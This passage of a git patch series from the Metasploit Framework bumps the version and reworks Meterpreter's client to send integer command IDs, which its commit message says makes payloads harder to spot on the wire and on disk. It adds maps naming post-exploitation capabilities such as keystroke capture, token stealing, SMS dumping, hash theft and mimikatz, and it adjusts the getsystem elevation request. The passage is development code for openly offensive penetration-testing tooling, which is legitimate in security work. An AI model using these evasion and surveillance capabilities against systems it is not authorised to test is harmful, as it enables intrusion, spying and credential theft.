From 88d42f5d7f367f98124c24f87321da3e54dfe415 Mon Sep 17 00:00:00 2001
From: Jeffrey Martin <Jeffrey_Martin@rapid7.com>
Date: Thu, 14 May 2020 17:52:02 -0500
Subject: [PATCH 01/20] bump version to 6.0.0 in progress

---
 Gemfile.lock                        | 2 +-
 lib/metasploit/framework/version.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index c6c4e334db6aa..6e42efc11cdc5 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.90)
+    metasploit-framework (6.0.0)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index d5d7ba7a9ea17..eb4bcc5b17f3b 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "5.0.90"
+      VERSION = "6.0.0"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

From 641f298819abc02cbf77e52c7778740aa3151acc Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 28 Apr 2020 21:55:40 +1000
Subject: [PATCH 02/20] Support removal of TLV strings

This first bit of code aims to add a "map" to the packet functionality
that is able to translate to and from "method strings" to "command ids".
IDs are sent across the wire, and they're now integers. This removes the
need for the strings to be present in things like native meterp, and
hence makes things a little less obvious on the wire, and way less
obvious on disk/in the payload.

Given that we need this functionality in other Meterpreters to support
the removal of strings, some code has been added that can generate
source files for Python, C# and C. This code might move, but for now
it's at least in a spot where it's used the most.
---
 lib/rex/post/meterpreter/client.rb            |   3 +-
 lib/rex/post/meterpreter/client_core.rb       |   6 +-
 .../extensions/powershell/powershell.rb       |   8 +
 .../post/meterpreter/extensions/priv/priv.rb  |  46 +-
 .../meterpreter/extensions/stdapi/mic/mic.rb  |   6 +-
 .../socket_subsystem/tcp_server_channel.rb    |   4 +-
 .../extensions/stdapi/webcam/webcam.rb        |  10 +-
 .../meterpreter/extensions/winpmem/winpmem.rb |   2 +-
 lib/rex/post/meterpreter/packet.rb            | 466 +++++++++++++++++-
 lib/rex/post/meterpreter/packet_dispatcher.rb |   6 +
 .../console/command_dispatcher/powershell.rb  |  39 +-
 11 files changed, 555 insertions(+), 41 deletions(-)

diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb
index 6adfd35f177bb..4fa77316b5242 100644
--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -316,7 +316,8 @@ def method_missing(symbol, *args)
   # registered extension that can be reached through client.ext.[extension].
   #
   def add_extension(name, commands=[])
-    self.commands |= commands
+    self.commands |= []
+    self.commands.concat(commands.map {|v| Rex::Post::Meterpreter.command_id_to_method_string(v)})
 
     # Check to see if this extension has already been loaded.
     if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 8c68e54c4cb9e..18e013e29ec03 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -125,7 +125,7 @@ def get_loaded_extension_commands(extension_name)
     end
 
     commands = []
-    response.each(TLV_TYPE_STRING) { |c|
+    response.each(TLV_TYPE_UINT) { |c|
       commands << c.value
     }
 
@@ -295,11 +295,11 @@ def load_library(opts)
     end
 
     commands = []
-    response.each(TLV_TYPE_METHOD) { |c|
+    response.each(TLV_TYPE_UINT) { |c|
       commands << c.value
     }
 
-    return commands
+    commands
   end
 
   #
diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
index 810aa24e622d7..08afb46b7f98d 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
@@ -55,6 +55,14 @@ def import_file(opts={})
     return false
   end
 
+  def session_remove(opts={})
+    return false unless opts[:session_id]
+    request = Packet.create_request('powershell_session_remove')
+    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
+    client.send_request(request)
+    return true
+  end
+
   def execute_string(opts={})
     return nil unless opts[:code]
 
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index 091b3ebe7a7bd..ffadc6630e714 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -43,33 +43,39 @@ def initialize(client)
   def getsystem( technique=0 )
     request = Packet.create_request( 'priv_elevate_getsystem' )
 
-    elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
+    # We only need the elevate DLL for when we're invoking the tokendup
+    # method, which we'll only use if required (ie. trying all or when
+    # that metdho is asked for explicitly)
+    if [0, 3].include?(technique)
+      elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
 
-    elevator_path = nil
-    client.binary_suffix.each { |s|
-      elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)
-      if !elevator_path.nil?
-        break
-      end
-    }
-    if elevator_path.nil?
-      elevators = ""
+      elevator_path = nil
       client.binary_suffix.each { |s|
-        elevators << "elevator.#{s}, "
+        elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)
+        if !elevator_path.nil?
+          break
+        end
       }
-      raise RuntimeError, "#{elevators.chomp(', ')} not found", caller
-    end
+      if elevator_path.nil?
+        elevators = ""
+        client.binary_suffix.each { |s|
+          elevators << "elevator.#{s}, "
+        }
+        raise RuntimeError, "#{elevators.chomp(', ')} not found", caller
+      end
 
-    elevator_data = ""
+      elevator_data = ""
 
-    ::File.open( elevator_path, "rb" ) { |f|
-      elevator_data += f.read( f.stat.size )
-    }
+      ::File.open( elevator_path, "rb" ) { |f|
+        elevator_data += f.read( f.stat.size )
+      }
+
+      request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
+      request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
+      request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
+    end
 
     request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
-    request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
-    request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
-    request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
 
     # as some service routines can be slow we bump up the timeout to 90 seconds
     response = client.send_request( request, 90 )
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb
index 0821053cb845f..08d61e42fce92 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb
@@ -26,7 +26,7 @@ def session
 
               # List available microphones
               def mic_list
-                response = client.send_request(Packet.create_request('audio_mic_list'))
+                response = client.send_request(Packet.create_request('stdapi_audio_mic_list'))
                 names = []
                 if response.result == 0
                   response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv|
@@ -38,7 +38,7 @@ def mic_list
 
               # Starts recording audio from microphone
               def mic_start(device_id)
-                request = Packet.create_request('audio_mic_start')
+                request = Packet.create_request('stdapi_audio_mic_start')
                 request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id)
                 response = client.send_request(request)
                 return nil unless response.result == 0
@@ -48,7 +48,7 @@ def mic_start(device_id)
 
               # Stop recording from microphone
               def mic_stop
-                client.send_request(Packet.create_request('audio_mic_stop'))
+                client.send_request(Packet.create_request('stdapi_audio_mic_stop'))
                 true
               end
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
index 743cdfc4a89fa..fdc3d9b58cbc4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
@@ -29,12 +29,12 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel
   #
   # This is the request handler which is registered to the respective meterpreter instance via
   # Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
-  # for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
+  # for a 'stdapi_net_tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
   # received and store it in the respective tcp server channels list of new pending client channels.
   # These new tcp client channels are passed off via a call the the tcp server channels accept() method.
   #
   def self.request_handler(client, packet)
-    return false unless packet.method == "tcp_channel_open"
+    return false unless packet.method == "stdapi_net_tcp_channel_open"
 
     cid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
     pid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
index 366cd8f09c3d0..2797efba518fc 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -26,7 +26,7 @@ def session
   end
 
   def webcam_list
-    response = client.send_request(Packet.create_request('webcam_list'))
+    response = client.send_request(Packet.create_request('stdapi_webcam_list'))
     names = []
     response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
       names << tlv.value
@@ -36,21 +36,21 @@ def webcam_list
 
   # Starts recording video from video source of index +cam+
   def webcam_start(cam)
-    request = Packet.create_request('webcam_start')
+    request = Packet.create_request('stdapi_webcam_start')
     request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)
     client.send_request(request)
     true
   end
 
   def webcam_get_frame(quality)
-    request = Packet.create_request('webcam_get_frame')
+    request = Packet.create_request('stdapi_webcam_get_frame')
     request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
   end
 
   def webcam_stop
-    client.send_request(Packet.create_request('webcam_stop'))
+    client.send_request(Packet.create_request('stdapi_webcam_stop'))
     true
   end
 
@@ -77,7 +77,7 @@ def webcam_chat(server)
   # Record from default audio source for +duration+ seconds;
   # returns a low-quality wav file
   def record_mic(duration)
-    request = Packet.create_request('webcam_audio_record')
+    request = Packet.create_request('stdapi_webcam_audio_record')
     request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_AUDIO_DATA).value
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
index c5fce52bcf3ec..4e9173190fc9e 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
@@ -33,7 +33,7 @@ def initialize(client)
   end
 
   def dump_ram
-    request = Packet.create_request('dump_ram')
+    request = Packet.create_request('winpmem_dump_ram')
     response = client.send_request(request)
     response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE)
 
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index e666c16231cd5..2dcb91488aba9 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -50,7 +50,7 @@ module Meterpreter
 # TLV Specific Types
 #
 TLV_TYPE_ANY                 = TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD              = TLV_META_TYPE_STRING |   1
+TLV_TYPE_METHOD              = TLV_META_TYPE_UINT   |   1
 TLV_TYPE_REQUEST_ID          = TLV_META_TYPE_STRING |   2
 TLV_TYPE_EXCEPTION           = TLV_META_TYPE_GROUP  |   3
 TLV_TYPE_RESULT              = TLV_META_TYPE_UINT   |   4
@@ -136,6 +136,461 @@ module Meterpreter
 GUID_SIZE = 16
 NULL_GUID = "\x00" * GUID_SIZE
 
+#
+# Mapping of command strings to identifiers
+#
+#
+COMMAND_ID_START_CORE       = 0
+COMMAND_ID_START_STDAPI     = 1000
+COMMAND_ID_START_PRIV       = 2000
+COMMAND_ID_START_EXTAPI     = 3000
+COMMAND_ID_START_SNIFFER    = 4000
+COMMAND_ID_START_ANDROID    = 5000
+COMMAND_ID_START_NETWORKPUG = 6000
+COMMAND_ID_START_WINPMEM    = 7000
+COMMAND_ID_START_KIWI       = 8000
+COMMAND_ID_START_APPAPI     = 9000
+COMMAND_ID_START_UNHOOK     = 10000
+COMMAND_ID_START_ESPIA      = 11000
+COMMAND_ID_START_INCOGNITO  = 12000
+COMMAND_ID_START_PYTHON     = 13000
+COMMAND_ID_START_POWERSHELL = 14000
+COMMAND_ID_START_LANATTACKS = 15000
+COMMAND_ID_START_PEINJECTOR = 16000
+COMMAND_ID_START_MIMIKATZ   = 17000
+
+COMMAND_ID_MAP_CORE = {
+  'core_channel_close'            => COMMAND_ID_START_CORE + 1,
+  'core_channel_eof'              => COMMAND_ID_START_CORE + 2,
+  'core_channel_interact'         => COMMAND_ID_START_CORE + 3,
+  'core_channel_open'             => COMMAND_ID_START_CORE + 4,
+  'core_channel_read'             => COMMAND_ID_START_CORE + 5,
+  'core_channel_seek'             => COMMAND_ID_START_CORE + 6,
+  'core_channel_tell'             => COMMAND_ID_START_CORE + 7,
+  'core_channel_write'            => COMMAND_ID_START_CORE + 8,
+  'core_console_write'            => COMMAND_ID_START_CORE + 9,
+  'core_enumextcmd'               => COMMAND_ID_START_CORE + 10,
+  'core_get_session_guid'         => COMMAND_ID_START_CORE + 11,
+  'core_loadlib'                  => COMMAND_ID_START_CORE + 12,
+  'core_machine_id'               => COMMAND_ID_START_CORE + 13,
+  'core_migrate'                  => COMMAND_ID_START_CORE + 14,
+  'core_native_arch'              => COMMAND_ID_START_CORE + 15,
+  'core_negotiate_tlv_encryption' => COMMAND_ID_START_CORE + 16,
+  'core_patch_url'                => COMMAND_ID_START_CORE + 17,
+  'core_pivot_add'                => COMMAND_ID_START_CORE + 18,
+  'core_pivot_remove'             => COMMAND_ID_START_CORE + 19,
+  'core_pivot_session_died'       => COMMAND_ID_START_CORE + 20,
+  'core_set_session_guid'         => COMMAND_ID_START_CORE + 21,
+  'core_set_uuid'                 => COMMAND_ID_START_CORE + 22,
+  'core_shutdown'                 => COMMAND_ID_START_CORE + 23,
+  'core_transport_add'            => COMMAND_ID_START_CORE + 24,
+  'core_transport_change'         => COMMAND_ID_START_CORE + 25,
+  'core_transport_getcerthash'    => COMMAND_ID_START_CORE + 26,
+  'core_transport_list'           => COMMAND_ID_START_CORE + 27,
+  'core_transport_next'           => COMMAND_ID_START_CORE + 28,
+  'core_transport_prev'           => COMMAND_ID_START_CORE + 29,
+  'core_transport_remove'         => COMMAND_ID_START_CORE + 30,
+  'core_transport_setcerthash'    => COMMAND_ID_START_CORE + 31,
+  'core_transport_set_timeouts'   => COMMAND_ID_START_CORE + 32,
+  'core_transport_sleep'          => COMMAND_ID_START_CORE + 33,
+}
+
+COMMAND_ID_MAP_STDAPI = {
+  'stdapi_fs_chdir'                           => COMMAND_ID_START_STDAPI + 1,
+  'stdapi_fs_chmod'                           => COMMAND_ID_START_STDAPI + 2,
+  'stdapi_fs_delete_dir'                      => COMMAND_ID_START_STDAPI + 3,
+  'stdapi_fs_delete_file'                     => COMMAND_ID_START_STDAPI + 4,
+  'stdapi_fs_file_copy'                       => COMMAND_ID_START_STDAPI + 5,
+  'stdapi_fs_file_expand_path'                => COMMAND_ID_START_STDAPI + 6,
+  'stdapi_fs_file_move'                       => COMMAND_ID_START_STDAPI + 7,
+  'stdapi_fs_getwd'                           => COMMAND_ID_START_STDAPI + 8,
+  'stdapi_fs_ls'                              => COMMAND_ID_START_STDAPI + 9,
+  'stdapi_fs_md5'                             => COMMAND_ID_START_STDAPI + 10,
+  'stdapi_fs_mkdir'                           => COMMAND_ID_START_STDAPI + 11,
+  'stdapi_fs_mount_show'                      => COMMAND_ID_START_STDAPI + 12,
+  'stdapi_fs_search'                          => COMMAND_ID_START_STDAPI + 13,
+  'stdapi_fs_separator'                       => COMMAND_ID_START_STDAPI + 14,
+  'stdapi_fs_sha1'                            => COMMAND_ID_START_STDAPI + 15,
+  'stdapi_fs_stat'                            => COMMAND_ID_START_STDAPI + 16,
+  'stdapi_net_config_add_route'               => COMMAND_ID_START_STDAPI + 17,
+  'stdapi_net_config_get_arp_table'           => COMMAND_ID_START_STDAPI + 18,
+  'stdapi_net_config_get_interfaces'          => COMMAND_ID_START_STDAPI + 19,
+  'stdapi_net_config_get_netstat'             => COMMAND_ID_START_STDAPI + 20,
+  'stdapi_net_config_get_proxy'               => COMMAND_ID_START_STDAPI + 21,
+  'stdapi_net_config_get_routes'              => COMMAND_ID_START_STDAPI + 22,
+  'stdapi_net_config_remove_route'            => COMMAND_ID_START_STDAPI + 23,
+  'stdapi_net_resolve_host'                   => COMMAND_ID_START_STDAPI + 24,
+  'stdapi_net_resolve_hosts'                  => COMMAND_ID_START_STDAPI + 25,
+  'stdapi_net_socket_tcp_shutdown'            => COMMAND_ID_START_STDAPI + 26,
+  'stdapi_net_tcp_channel_open'               => COMMAND_ID_START_STDAPI + 27,
+  'stdapi_railgun_api'                        => COMMAND_ID_START_STDAPI + 28,
+  'stdapi_railgun_api_multi'                  => COMMAND_ID_START_STDAPI + 29,
+  'stdapi_railgun_memread'                    => COMMAND_ID_START_STDAPI + 30,
+  'stdapi_railgun_memwrite'                   => COMMAND_ID_START_STDAPI + 31,
+  'stdapi_registry_check_key_exists'          => COMMAND_ID_START_STDAPI + 32,
+  'stdapi_registry_close_key'                 => COMMAND_ID_START_STDAPI + 33,
+  'stdapi_registry_create_key'                => COMMAND_ID_START_STDAPI + 34,
+  'stdapi_registry_delete_key'                => COMMAND_ID_START_STDAPI + 35,
+  'stdapi_registry_delete_value'              => COMMAND_ID_START_STDAPI + 36,
+  'stdapi_registry_enum_key'                  => COMMAND_ID_START_STDAPI + 37,
+  'stdapi_registry_enum_key_direct'           => COMMAND_ID_START_STDAPI + 38,
+  'stdapi_registry_enum_value'                => COMMAND_ID_START_STDAPI + 39,
+  'stdapi_registry_enum_value_direct'         => COMMAND_ID_START_STDAPI + 40,
+  'stdapi_registry_load_key'                  => COMMAND_ID_START_STDAPI + 41,
+  'stdapi_registry_open_key'                  => COMMAND_ID_START_STDAPI + 42,
+  'stdapi_registry_open_remote_key'           => COMMAND_ID_START_STDAPI + 43,
+  'stdapi_registry_query_class'               => COMMAND_ID_START_STDAPI + 44,
+  'stdapi_registry_query_value'               => COMMAND_ID_START_STDAPI + 45,
+  'stdapi_registry_query_value_direct'        => COMMAND_ID_START_STDAPI + 46,
+  'stdapi_registry_set_value'                 => COMMAND_ID_START_STDAPI + 47,
+  'stdapi_registry_set_value_direct'          => COMMAND_ID_START_STDAPI + 48,
+  'stdapi_registry_unload_key'                => COMMAND_ID_START_STDAPI + 49,
+  'stdapi_sys_config_driver_list'             => COMMAND_ID_START_STDAPI + 50,
+  'stdapi_sys_config_drop_token'              => COMMAND_ID_START_STDAPI + 51,
+  'stdapi_sys_config_getenv'                  => COMMAND_ID_START_STDAPI + 52,
+  'stdapi_sys_config_getprivs'                => COMMAND_ID_START_STDAPI + 53,
+  'stdapi_sys_config_getsid'                  => COMMAND_ID_START_STDAPI + 54,
+  'stdapi_sys_config_getuid'                  => COMMAND_ID_START_STDAPI + 55,
+  'stdapi_sys_config_localtime'               => COMMAND_ID_START_STDAPI + 56,
+  'stdapi_sys_config_rev2self'                => COMMAND_ID_START_STDAPI + 57,
+  'stdapi_sys_config_steal_token'             => COMMAND_ID_START_STDAPI + 58,
+  'stdapi_sys_config_sysinfo'                 => COMMAND_ID_START_STDAPI + 59,
+  'stdapi_sys_eventlog_clear'                 => COMMAND_ID_START_STDAPI + 60,
+  'stdapi_sys_eventlog_close'                 => COMMAND_ID_START_STDAPI + 61,
+  'stdapi_sys_eventlog_numrecords'            => COMMAND_ID_START_STDAPI + 62,
+  'stdapi_sys_eventlog_oldest'                => COMMAND_ID_START_STDAPI + 63,
+  'stdapi_sys_eventlog_open'                  => COMMAND_ID_START_STDAPI + 64,
+  'stdapi_sys_eventlog_read'                  => COMMAND_ID_START_STDAPI + 65,
+  'stdapi_sys_power_exitwindows'              => COMMAND_ID_START_STDAPI + 66,
+  'stdapi_sys_process_attach'                 => COMMAND_ID_START_STDAPI + 67,
+  'stdapi_sys_process_close'                  => COMMAND_ID_START_STDAPI + 68,
+  'stdapi_sys_process_execute'                => COMMAND_ID_START_STDAPI + 69,
+  'stdapi_sys_process_get_info'               => COMMAND_ID_START_STDAPI + 70,
+  'stdapi_sys_process_get_processes'          => COMMAND_ID_START_STDAPI + 71,
+  'stdapi_sys_process_getpid'                 => COMMAND_ID_START_STDAPI + 72,
+  'stdapi_sys_process_image_get_images'       => COMMAND_ID_START_STDAPI + 73,
+  'stdapi_sys_process_image_get_proc_address' => COMMAND_ID_START_STDAPI + 74,
+  'stdapi_sys_process_image_load'             => COMMAND_ID_START_STDAPI + 75,
+  'stdapi_sys_process_image_unload'           => COMMAND_ID_START_STDAPI + 76,
+  'stdapi_sys_process_kill'                   => COMMAND_ID_START_STDAPI + 77,
+  'stdapi_sys_process_memory_allocate'        => COMMAND_ID_START_STDAPI + 78,
+  'stdapi_sys_process_memory_free'            => COMMAND_ID_START_STDAPI + 79,
+  'stdapi_sys_process_memory_lock'            => COMMAND_ID_START_STDAPI + 80,
+  'stdapi_sys_process_memory_protect'         => COMMAND_ID_START_STDAPI + 81,
+  'stdapi_sys_process_memory_query'           => COMMAND_ID_START_STDAPI + 82,
+  'stdapi_sys_process_memory_read'            => COMMAND_ID_START_STDAPI + 83,
+  'stdapi_sys_process_memory_unlock'          => COMMAND_ID_START_STDAPI + 84,
+  'stdapi_sys_process_memory_write'           => COMMAND_ID_START_STDAPI + 85,
+  'stdapi_sys_process_thread_close'           => COMMAND_ID_START_STDAPI + 86,
+  'stdapi_sys_process_thread_create'          => COMMAND_ID_START_STDAPI + 87,
+  'stdapi_sys_process_thread_get_threads'     => COMMAND_ID_START_STDAPI + 88,
+  'stdapi_sys_process_thread_open'            => COMMAND_ID_START_STDAPI + 89,
+  'stdapi_sys_process_thread_query_regs'      => COMMAND_ID_START_STDAPI + 90,
+  'stdapi_sys_process_thread_resume'          => COMMAND_ID_START_STDAPI + 91,
+  'stdapi_sys_process_thread_set_regs'        => COMMAND_ID_START_STDAPI + 92,
+  'stdapi_sys_process_thread_suspend'         => COMMAND_ID_START_STDAPI + 93,
+  'stdapi_sys_process_thread_terminate'       => COMMAND_ID_START_STDAPI + 94,
+  'stdapi_sys_process_wait'                   => COMMAND_ID_START_STDAPI + 95,
+  'stdapi_ui_desktop_enum'                    => COMMAND_ID_START_STDAPI + 96,
+  'stdapi_ui_desktop_get'                     => COMMAND_ID_START_STDAPI + 97,
+  'stdapi_ui_desktop_screenshot'              => COMMAND_ID_START_STDAPI + 98,
+  'stdapi_ui_desktop_set'                     => COMMAND_ID_START_STDAPI + 99,
+  'stdapi_ui_enable_keyboard'                 => COMMAND_ID_START_STDAPI + 100,
+  'stdapi_ui_enable_mouse'                    => COMMAND_ID_START_STDAPI + 101,
+  'stdapi_ui_get_idle_time'                   => COMMAND_ID_START_STDAPI + 102,
+  'stdapi_ui_get_keys_utf8'                   => COMMAND_ID_START_STDAPI + 103,
+  'stdapi_ui_send_keyevent'                   => COMMAND_ID_START_STDAPI + 104,
+  'stdapi_ui_send_keys'                       => COMMAND_ID_START_STDAPI + 105,
+  'stdapi_ui_send_mouse'                      => COMMAND_ID_START_STDAPI + 106,
+  'stdapi_ui_start_keyscan'                   => COMMAND_ID_START_STDAPI + 107,
+  'stdapi_ui_stop_keyscan'                    => COMMAND_ID_START_STDAPI + 108,
+  'stdapi_ui_unlock_desktop'                  => COMMAND_ID_START_STDAPI + 109,
+  'stdapi_webcam_audio_record'                => COMMAND_ID_START_STDAPI + 110,
+  'stdapi_webcam_get_frame'                   => COMMAND_ID_START_STDAPI + 111,
+  'stdapi_webcam_list'                        => COMMAND_ID_START_STDAPI + 112,
+  'stdapi_webcam_start'                       => COMMAND_ID_START_STDAPI + 113,
+  'stdapi_webcam_stop'                        => COMMAND_ID_START_STDAPI + 114,
+}
+
+COMMAND_ID_MAP_ANDROID = {
+  'android_activity_start'   => COMMAND_ID_START_ANDROID + 1,
+  'android_check_root'       => COMMAND_ID_START_ANDROID + 2,
+  'android_device_shutdown'  => COMMAND_ID_START_ANDROID + 3,
+  'android_dump_calllog'     => COMMAND_ID_START_ANDROID + 4,
+  'android_dump_contacts'    => COMMAND_ID_START_ANDROID + 5,
+  'android_dump_sms'         => COMMAND_ID_START_ANDROID + 6,
+  'android_geolocate'        => COMMAND_ID_START_ANDROID + 7,
+  'android_hide_app_icon'    => COMMAND_ID_START_ANDROID + 8,
+  'android_interval_collect' => COMMAND_ID_START_ANDROID + 9,
+  'android_send_sms'         => COMMAND_ID_START_ANDROID + 10,
+  'android_set_audio_mode'   => COMMAND_ID_START_ANDROID + 11,
+  'android_set_wallpaper'    => COMMAND_ID_START_ANDROID + 12,
+  'android_sqlite_query'     => COMMAND_ID_START_ANDROID + 13,
+  'android_wakelock'         => COMMAND_ID_START_ANDROID + 14,
+  'android_wlan_geolocate'   => COMMAND_ID_START_ANDROID + 15,
+}
+
+COMMAND_ID_MAP_APPAPI = {
+  'appapi_app_install'   => COMMAND_ID_START_APPAPI + 1,
+  'appapi_app_list'      => COMMAND_ID_START_APPAPI + 2,
+  'appapi_app_run'       => COMMAND_ID_START_APPAPI + 3,
+  'appapi_app_uninstall' => COMMAND_ID_START_APPAPI + 4,
+}
+
+COMMAND_ID_MAP_WINPMEM = {
+  'winpmem_dump_ram' => COMMAND_ID_START_WINPMEM + 1,
+}
+
+COMMAND_ID_MAP_ESPIA = {
+  'espia_image_get_dev_screen' => COMMAND_ID_START_ESPIA + 1,
+}
+
+COMMAND_ID_MAP_EXTAPI = {
+  'extapi_adsi_domain_query'        => COMMAND_ID_START_EXTAPI + 1,
+  'extapi_clipboard_get_data'       => COMMAND_ID_START_EXTAPI + 2,
+  'extapi_clipboard_monitor_dump'   => COMMAND_ID_START_EXTAPI + 3,
+  'extapi_clipboard_monitor_pause'  => COMMAND_ID_START_EXTAPI + 4,
+  'extapi_clipboard_monitor_purge'  => COMMAND_ID_START_EXTAPI + 5,
+  'extapi_clipboard_monitor_resume' => COMMAND_ID_START_EXTAPI + 6,
+  'extapi_clipboard_monitor_start'  => COMMAND_ID_START_EXTAPI + 7,
+  'extapi_clipboard_monitor_stop'   => COMMAND_ID_START_EXTAPI + 8,
+  'extapi_clipboard_set_data'       => COMMAND_ID_START_EXTAPI + 9,
+  'extapi_ntds_parse'               => COMMAND_ID_START_EXTAPI + 10,
+  'extapi_pageant_send_query'       => COMMAND_ID_START_EXTAPI + 11,
+  'extapi_service_control'          => COMMAND_ID_START_EXTAPI + 12,
+  'extapi_service_enum'             => COMMAND_ID_START_EXTAPI + 13,
+  'extapi_service_query'            => COMMAND_ID_START_EXTAPI + 14,
+  'extapi_window_enum'              => COMMAND_ID_START_EXTAPI + 15,
+  'extapi_wmi_query'                => COMMAND_ID_START_EXTAPI + 16,
+}
+
+COMMAND_ID_MAP_INCOGNITO = {
+  'incognito_add_group_user'      => COMMAND_ID_START_INCOGNITO + 1,
+  'incognito_add_localgroup_user' => COMMAND_ID_START_INCOGNITO + 2,
+  'incognito_add_user'            => COMMAND_ID_START_INCOGNITO + 3,
+  'incognito_impersonate_token'   => COMMAND_ID_START_INCOGNITO + 4,
+  'incognito_list_tokens'         => COMMAND_ID_START_INCOGNITO + 5,
+  'incognito_snarf_hashes'        => COMMAND_ID_START_INCOGNITO + 6,
+}
+
+COMMAND_ID_MAP_KIWI = {
+  'kiwi_exec_cmd' => COMMAND_ID_START_KIWI + 1,
+}
+
+COMMAND_ID_MAP_LANATTACKS = {
+  'lanattacks_add_tftp_file'   => COMMAND_ID_START_LANATTACKS + 1,
+  'lanattacks_dhcp_log'        => COMMAND_ID_START_LANATTACKS + 2,
+  'lanattacks_reset_dhcp'      => COMMAND_ID_START_LANATTACKS + 3,
+  'lanattacks_reset_tftp'      => COMMAND_ID_START_LANATTACKS + 4,
+  'lanattacks_set_dhcp_option' => COMMAND_ID_START_LANATTACKS + 5,
+  'lanattacks_start_dhcp'      => COMMAND_ID_START_LANATTACKS + 6,
+  'lanattacks_start_tftp'      => COMMAND_ID_START_LANATTACKS + 7,
+  'lanattacks_stop_dhcp'       => COMMAND_ID_START_LANATTACKS + 8,
+  'lanattacks_stop_tftp'       => COMMAND_ID_START_LANATTACKS + 9,
+}
+
+COMMAND_ID_MAP_MIMIKATZ = {
+  'mimikatz_custom_command' => COMMAND_ID_START_MIMIKATZ + 1,
+}
+
+COMMAND_ID_MAP_NETWORKPUG = {
+  'networkpug_start' => COMMAND_ID_START_NETWORKPUG + 1,
+  'networkpug_stop'  => COMMAND_ID_START_NETWORKPUG + 2,
+}
+
+COMMAND_ID_MAP_PEINJECTOR = {
